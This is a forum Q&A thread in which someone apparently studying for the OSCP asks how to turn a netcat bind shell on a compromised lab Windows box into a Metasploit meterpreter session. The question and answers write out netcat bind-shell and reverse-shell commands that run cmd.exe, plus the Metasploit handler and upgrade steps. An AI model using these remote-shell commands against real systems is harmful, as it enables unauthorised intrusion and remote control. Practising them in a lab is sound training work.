# Using msf to connect to netcat listener and shell_to_meterperter

Tags: metasploit, oscp

I've been trying for hours and failing to do something that should be simple!

I have a box w/ admin (taking OSCP - nothing illegal).   I used an RDP exploit, got a shell, added a user, put user in administrators group and as I sit I currently am on an rdesktop with an administrator.

Given - 
TARGET - 192.168.1.200, I have an admin shell and access to rdesktop. Have uploaded nc.exe

KALI - My machine - 192.168.1.100.

What I am trying to do is open a LISTENING port on the TARGET ...
c:\nc -lvp 9999 -e c:\windows\system32\cmd.exe

...connect to that open port from my KALI box while using metasploit framework.

I can connect using nc 192.168.1.200 9999, but I can't make that connection a metasploit session.

Then turn this connection into a meterpreter session using 
post/multi/manage/shell_to_meterpreter

Thanks!

Answer (score 2):

I got it!!!

https://www.youtube.com/watch?v=LRS05gvcvdk

I needed to set my TARGET listener to port 4444.  Then I run multi/handler, then payload windows/shell_bind_tcp

Exploit and I get the shell.
Ctrl-Z to background the session, then run: 
`post/multi/manage/shell_to_meterpreter`
on the session and bam got it running!

Answer (score 1):

schroeder is rigth you should connect to it from your client with `nc -v 192.168.1.100 4040` (place your ip and your port) or use a `windows/shell/bind_tcp payload` from the msfconsole and then upgrade the session to meterpreter. [post explotation shell to meterpreter](https://www.rapid7.com/db/modules/post/multi/manage/shell_to_meterpreter)

and the second thig is , I think you will not get a reverse connection from your server just by `nc -nvl 9090 -e cmd.exe`  (this command just open the port 9090  and redirection every input , output, to a cmd instance and its a "bind server" the `-l option is to listen` , to generate a reverse server with nc you should run `nc -v 10.10.1.10 4040 -e cmd.exe` and your machine as the listener)

Comment: i think instead of leaving a answer you should edit your question  and describe better because the situation its not clear . 
ok you succesfully penetrate the system 192.168.1.200 and you get a cmd shell. (what payload thit you use ??? what type of connection did you set ??) from whre ?? i think you are missing a lot of info ...

(i leave it here because i cant leave him a comment )